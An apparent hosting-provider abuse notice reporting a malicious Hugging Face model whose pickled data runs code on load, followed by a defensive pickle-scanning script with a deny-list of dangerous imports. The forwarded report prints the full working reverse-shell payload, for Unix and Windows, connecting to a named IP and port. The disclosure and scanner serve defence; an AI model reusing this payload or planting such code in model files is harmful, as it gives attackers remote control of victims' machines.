Hello,
The hosting of abusive content (malware) on your dedicated server ns318025.ip-37-187-153.eu has been reported to or noticed by our Abuse Team.
Technical details (such as URLs) showing the aforementioned problem follow:
-- start of the technical details --
-- about ---
37.187.153.152
-Category: malware
--- logs follow ---
Hi,
This malicious Hugging Face model:
https://huggingface.co/jsteel2/taiwannumberone/blob/main/pytorch_model.bin
contains code that, when loaded, opens a reverse shell to 37.187.153.152. You can check this with the commands:
wget https://huggingface.co/jsteel2/taiwannumberone/resolve/main/pytorch_model.bin
unzip pytorch_model.bin
cat pytorch_standard_model/data.pkl
The cat command shows:
\ufffdcbuiltins
exec
(X\ufffd
RHOST="37.187.153.152";RPORT=4242;
from sys import platform
if platform != 'win32':
    import threading
    def a():
        import socket, pty, os
        RHOST="37.187.153.152";RPORT=4242
        s=socket.socket();s.connect((RHOST,RPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")
    threading.Thread(target=a).start()
else:
    import os, socket, subprocess, threading, sys
    def s2p(s, p):
        while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()
    def p2s(s, p):
        while True: s.send(p.stdout.read(1).encode())
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        try: s.connect(("37.187.153.152", 4242)); break
        except: pass
    p=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)
    threading.Thread(target=s2p, args=[s,p], daemon=True).start()
    threading.Thread(target=p2s, args=[s,p], daemon=True).start()
    p.wait()
-- Forwarded email(s) --
-- end of the technical details --
You should investigate and fix this problem, as it constitutes a violation of our terms of service.
Please reply to this e-mail indicating which measures you've taken to stop the abusive behaviour.
Cordially,
The OVHcloud Trust & Safety team.
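
The data.pkl shown in the report starts with a `builtins exec` import followed by a call, which is what makes loading the model run code. The sketch below is an added example, not part of the e-mail or of any tool it mentions: it lists the imports a pickle would perform by walking its opcodes with `pickletools`, without ever unpickling it. The function names, the deny-list and the harmless sample archive are assumptions constructed for illustration.

```python
import io
import pickle
import pickletools
import zipfile

# Assumed deny-list for this example (not exhaustive): imports that give a pickle code execution.
DANGEROUS = {
    ("builtins", "exec"), ("builtins", "eval"), ("builtins", "__import__"),
    ("os", "system"), ("posix", "system"), ("nt", "system"), ("subprocess", "Popen"),
}

def pickle_imports(data: bytes):
    """Return the (module, name) pairs a pickle stream would import, without loading it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):        # argument is the text "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Heuristic: module and name are normally the two strings pushed just before.
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

def scan_model(path_or_file):
    """Scan every *.pkl member of a zip-format PyTorch checkpoint; return flagged imports."""
    hits = {}
    with zipfile.ZipFile(path_or_file) as zf:
        for member in zf.namelist():
            if member.endswith(".pkl"):
                bad = [g for g in pickle_imports(zf.read(member)) if g in DANGEROUS]
                if bad:
                    hits[member] = bad
    return hits

def constructed_sample() -> io.BytesIO:
    """Constructed archive: same opcode shape as the reported data.pkl, harmless body."""
    src = b"pass"
    pkl = b"\x80\x02cbuiltins\nexec\n(X" + len(src).to_bytes(4, "little") + src + b"tR."
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pytorch_standard_model/data.pkl", pkl)
        zf.writestr("pytorch_standard_model/benign.pkl", pickle.dumps({"w": [1, 2]}))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    print(scan_model(constructed_sample()))
```

`scan_model` also accepts a file path, so it can be pointed at a downloaded checkpoint before anything calls `torch.load` on it.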